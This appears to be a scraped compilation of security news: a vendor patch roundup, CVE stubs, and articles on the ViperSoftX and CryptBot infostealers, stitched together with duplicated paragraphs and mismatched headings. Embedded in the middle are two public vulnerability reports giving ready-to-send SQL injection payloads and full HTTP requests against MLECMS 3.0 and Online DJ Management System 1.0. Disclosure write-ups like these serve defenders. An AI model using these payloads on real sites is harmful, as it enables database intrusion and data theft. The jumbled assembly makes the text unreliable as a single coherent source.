Firefox gets a needed tune-up, SolarWinds squashes two high-severity bugs, Oracle patches 433 vulnerabilities, and more updates you should make now.

Given the number and seriousness of the issues, Chrome users should prioritize checking that their current version is up to date.

Mozilla Firefox

Chrome rival Firefox has fixed issues in Firefox 112, Firefox for Android 112, and Focus for Android 112. Among the flaws is CVE-2023-29531, an out-of-bound memory access in WebGL on macOS rated as having a high impact. Meanwhile, CVE-2023-29532 is a bypass flaw affecting Windows, which requires local system access.

CVE-2023-1999 is a double-free in libwebp that could result in memory corruption and a potentially exploitable crash, Firefox owner Mozilla wrote in an advisory.

Mozilla also fixed two memory safety bugs, CVE-2023-29550 and CVE-2023-29551. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort, some of these could have been exploited to run arbitrary code,” the browser maker said.

SolarWinds

IT giant SolarWinds has patched two high-severity issues in its platform that could lead to command execution and privilege escalation. Tracked as CVE-2022-36963, the first issue is a command-injection flaw in SolarWinds’ infrastructure monitoring and management product, the firm wrote in a security advisory. If exploited, the bug could allow a remote adversary with a valid SolarWinds Platform admin account to execute arbitrary commands.

Another high-severity issue is CVE-2022-47505, a local privilege escalation vulnerability that a local adversary with a valid system user account could use to escalate privileges.

The latest SolarWinds patch fixes several more issues rated as having a medium impact. None have been used in attacks, but if you are impacted by the flaws, it makes sense to update as soon as possible.

Oracle

April has been a big month for enterprise software maker Oracle, which has issued fixes for 433 vulnerabilities, 70 of which are rated as having a critical severity. These include issues in the Oracle GoldenGate Risk Matrix, including CVE-2022-23457, which has a CVSS base score of 9.8. The issue may be remotely exploitable without authentication, Oracle said in its advisory.

The April fixes also contain six new patches for Oracle Commerce. “All of these vulnerabilities may be remotely exploitable without authentication,” Oracle warned.

Due to the threat posed by a successful attack, Oracle “strongly recommends” that customers apply Critical Patch Update security fixes as soon as possible.

Cisco

Software firm Cisco has released fixes for vulnerabilities that could allow an authenticated, local attacker to escape the restricted shell and gain root privileges on the underlying operating system.

CVE-2023-20121, which affects Cisco EPNM, Cisco ISE, and Cisco Prime Infrastructure, is a  command-injection vulnerability. An attacker could exploit the flaw by logging in to the device and issuing a crafted CLI command. “A successful exploit could allow the attacker to escape the restricted shell and gain root privileges on the underlying operating system of the affected device,” Cisco said, adding that the attacker must be an authenticated shell user to exploit the flaw.

Meanwhile, CVE-2023-20122 is a command-injection vulnerability in the restricted shell of Cisco ISE that could allow an authenticated, local attacker to escape the restricted shell and gain root privileges on the underlying operating system.

SAP

It’s been another busy Patch Day for SAP, which saw the release of 19 new Security Notes. Among the fixes are CVE-2023-27497, comprising multiple vulnerabilities in SAP Diagnostics Agent. Another notable patch is CVE-2023-28765, an information disclosure vulnerability in SAP BusinessObjects Business Intelligence Platform. A missing password protection enforcement allows an attacker to access the lcmbiar file, according to security firm Onapsis. “After successful decryption of its content, the attacker could gain access to a user’s passwords,” the firm explained. “Depending on the authorizations of the impersonated user, an attacker could completely compromise the system’s confidentiality, integrity, and availability.”

Apple, Google, and Microsoft Just Fixed Zero-Day Security Flaws

A vulnerability was found in MLECMS 3.0. It has been rated as critical. This issue affects the function get_url in the library /upload/inc/lib/admin of the file upload\inc\include\common.func.php. The manipulation of the argument $_SERVER['REQUEST_URI'] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227717 was assigned to this vulnerability.

Source code download address： http://www.mlecms.com/download/zip/mlecms-3.0.zip Operating environment：Nginx+mysql

A vulnerability exists in the "get\_url()" function in lines 40-53 of the "upload\\inc\\include\\common.func.php" file,This function directly obtains the URL from "$\_SERVER" and returns it without filtering, which may lead to SQL injection or XSS vulnerabilities

Global search for "get\_url", where "get\_url" exists in "/upload/inc/lib/admin.lib.php" and is directly spliced into SQL statements

Open this file, line 49. The risky SQL statement is located in the "logs ()" method

Continue to track the "logs" method, which is used on lines 13 and 16 of the " \\upload\\admin\\channel\_manage.php" file

Analyze the routing, combine the file name characteristics, and locate the function point at "网站频道管理"

Analyze" channel\_manage. php ", and only execute" admin:: logs "when" $\_GET \['del '\] "is a number and" $ass \['id'\] "is empty."

After analyzing and testing "$db ->query" to construct a request package, it is known that the deleted channel ID is greater than the actual channel ID, which can make "$ass \['id '\]" null. Because" $\_GET \['del '\] "must be a number, and the vulnerability point is located in the URL, requiring the insertion of characters. Therefore, combined with SQL statements, the following error injection method can be used to query the database name: channel\_manage.php?del=1111#'or updatexml(1,concat(0x7e,database()),0) or'

Query user

The test environment is Nginx+MySQL. If other middleware is used, it may be necessary to reconstruct the payload data packet： GET /admin/channel\_manage.php?del=1111#'or updatexml(1,concat(0x7e,user()),0) or' HTTP/1.1 Host: 192.168.31.128:90 accept: _/_ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=1ohoqsk1aaiaj81sr1ngt5phm0; mlecms\_global\_language=1 Connection: close

CVE-2023-2420: elecms/README.md at main · VG00000/elecms

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVE-2023-29334

Concrete CMS (previously concrete5) before 9.1 did not have a rate limit for password resets.

CVE-2023-28821: Releases · concretecms/concretecms

A vulnerability classified as critical was found in SourceCodester Online DJ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/inquiries/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227647.

**Online DJ Management System v1.0 has SQL injection**

BUG\_Author:yohane

Website source code address: https://www.sourcecodester.com/php/15150/online-dj-management-system-phpoop-free-source-code.html

Vulnerability File: /odjms/admin/inquiries/view\_details.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=-1' union all select null,null,null,null,concat(0x66676869,0x515253),null,null-- -

    GET /odjms/admin/inquiries/view_details.php?id=-1%27%20union%20all%20select%20null,null,null,null,concat(0x66676869,0x515253),null,null--%20- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=fadnbe58h1fq1i9pdtcrr5juc1
    Connection: close
    

union query success

Payload2:id=1' and 6=6 AND 'x'='x

    GET /odjms/admin/inquiries/view_details.php?id=1%27%20and%206=6%20AND%20%27x%27=%27x HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=fadnbe58h1fq1i9pdtcrr5juc1
    Connection: close
    

The page is echoed normally

CVE-2023-2371: bug_report/SQLi-1.md at main · yoyoyoyoyohane/bug_report

A significant number of victims in the consumer and enterprise sectors located across Australia, Japan, the U.S., and India have been affected by an evasive information-stealing malware called ViperSoftX.
ViperSoftX was first documented in 2020, with cybersecurity company Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension

A significant number of victims in the consumer and enterprise sectors located across Australia, Japan, the U.S., and India have been affected by an evasive information-stealing malware called **ViperSoftX**.

ViperSoftX was first documented in 2020, with cybersecurity company Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension capable of siphoning cryptocurrencies from wallet applications.

Now a new analysis from Trend Micro has revealed the malware's adoption of "more sophisticated encryption and basic anti-analysis techniques, such as byte remapping and web browser communication blocking."

The arrival vector of ViperSoftX is typically a software crack or a key generator (keygen), while also employing actual non-malicious software like multimedia editors and system cleaner apps as "carriers."

One of the key steps performed by the malware before downloading a first-stage PowerShell loader is a series of anti-virtual machine, anti-monitoring, and anti-malware checks.

The loader then decrypts and executes a second-stage PowerShell script retrieved from a remote server, which then takes care of launching the main routine responsible for installing rogue browser extensions to exfiltrate passwords and crypto wallet data.

The primary command-and-control (C&C) servers used for the second stage download have been observed to change on a monthly basis, suggesting attempts on the part of the actor to sidestep detection.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

"It also uses some basic anti-C&C analyses by disallowing communications using web browsers," Trend Micro researcher Don Ovid Ladores said, adding the updated version of ViperSoftX scans for the presence of KeePass 2 and 1Password password managers.

As mitigations, it's advised that users download software only from official platforms and sources, and avoid downloading illegal software.

"The cybercriminals behind ViperSoftX are also skilled enough to execute a seamless chain for malware execution while staying under the radar of authorities by selecting one of the most effective methods for delivering malware to consumers," Ovid Ladores added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

ViperSoftX InfoStealer Adopts Sophisticated Techniques to Avoid Detection

**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?**

The user would have to click on a specially crafted URL to be compromised by the attacker.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20230404**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230404)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-29334: Microsoft Edge (Chromium-based) Spoofing Vulnerability

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-28261

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE-2023-28286

Google on Wednesday said it obtained a temporary court order in the U.S. to disrupt the distribution of a Windows-based information-stealing malware called CryptBot and "decelerate" its growth.
The tech giant's Mike Trinh and Pierre-Marc Bureau said the efforts are part of steps it takes to "not only hold criminal operators of malware accountable, but also those who profit from its distribution.

Google on Wednesday said it obtained a temporary court order in the U.S. to disrupt the distribution of a Windows-based information-stealing malware called CryptBot and "decelerate" its growth.

The tech giant's Mike Trinh and Pierre-Marc Bureau said the efforts are part of steps it takes to "not only hold criminal operators of malware accountable, but also those who profit from its distribution."

**CryptBot** is estimated to have infected over 670,000 computers in 2022 with the goal of stealing sensitive data such as authentication credentials, social media account logins, and cryptocurrency wallets from users of Google Chrome.

The harvested data is then exfiltrated to the threat actors, who then sell the data to other attackers for use in data breach campaigns. CryptBot was first discovered in the wild in December 2019.

The malware has been traditionally delivered via maliciously modified versions of legitimate and popular software packages such as Google Earth Pro and Google Chrome that are hosted on fake websites.

What's more, a CryptBot campaign unearthed by Red Canary in December 2021 entailed the use of KMSPico, an unofficial tool that's used to illegally activate Microsoft Office and Windows without a license key, as a delivery vector.

Then in March 2022, BlackBerry disclosed details of a new and improved version of the malicious infostealer that was distributed via compromised pirate sites that purport to offer "cracked" versions of various software and video games.

The major distributors of CryptBot, per Google, are suspected to be operating a "worldwide criminal enterprise" based out of Pakistan.

Google said it intends to use the court order, granted by a federal judge in the Southern District of New York, to "take down current and future domains that are tied to the distribution of CryptBot," thereby kneecapping the spread of new infections.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

To mitigate risks posed by such threats, it's advised to only download software from well-known and trusted sources, scrutinize reviews, and ensure that the device's operating system and software are kept up-to-date.

The disclosure comes weeks after Microsoft, Fortra, and Health Information Sharing and Analysis Center (Health-ISAC) legally joined hands to dismantle servers hosting illegal, legacy copies of Cobalt Strike to prevent the tool's abuse by threat actors.

It also follows Google's endeavors to shut down the command-and-control infrastructure associated with a botnet dubbed Glupteba in December 2021. The malware, however, staged a return six months later as part of an "upscaled" campaign.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#chrome